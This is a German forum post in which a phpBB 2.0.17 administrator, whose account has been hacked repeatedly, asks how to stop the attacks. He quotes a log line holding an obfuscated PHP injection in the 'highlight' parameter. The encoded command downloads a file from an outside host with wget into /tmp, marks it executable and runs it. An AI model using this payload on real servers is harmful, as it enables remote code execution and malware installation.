Langsam bin ich am verzweifeln!
Im letzten halben Jahr wurde mein Account über das Forum bereits zum 4. Mal gehackt! Der Provider sagt, es werde über ein unsicheres Skript Shell-Code ausgeführt.
Leider habe ich aber überhaupt keine Ahnung, wie ich dem Fehler auf die Spur kommen bzw. ihn beseitigen kann. (ich verwende 2.0.17 mit .htaccess für den Adminbereich sowie den CBACK-CRACKER-TRACKER)
In meinen Weblogs ist mir folgendes aufgefallen:
Kann es das sein und wenn ja, was muß ich dagegen tun?modemcable105.237-80-70.mc.videotron.ca - - [15/Aug/2005:04:33:54 +0200] "GET /phpbb/viewtopic.php?p=1554&highlight=%2527%252esystem(chr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(99)%252echr(111)%252echr(109)%252echr(101)%252echr(99)%252echr(111)%252echr(59)%252echr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252echr(118)%252echr(111)%252echr(105)%252echr(108)%252echr(97)%252echr(46)%252echr(102)%252echr(114)%252echr(47)%252echr(110)%252echr(117)%252echr(120)%252echr(47)%252echr(107)%252echr(97)%252echr(59)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(107)%252echr(97)%252echr(59)%252echr(46)%252echr(47)%252echr(107)%252echr(97)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(117)%252echr(110)%252echr(102)%252echr(105)%252echr(109))%252e%2527 HTTP/1.0" 302 1431 "-" "Mozilla/4.0
Bitte helft mir, mein Provider hat mir schon nahe gelegt, daß ich die Forensoftware wechseln soll, was ich aber nicht wirklich möchte!
Vielen Dank schon mal!
l.g. maxl
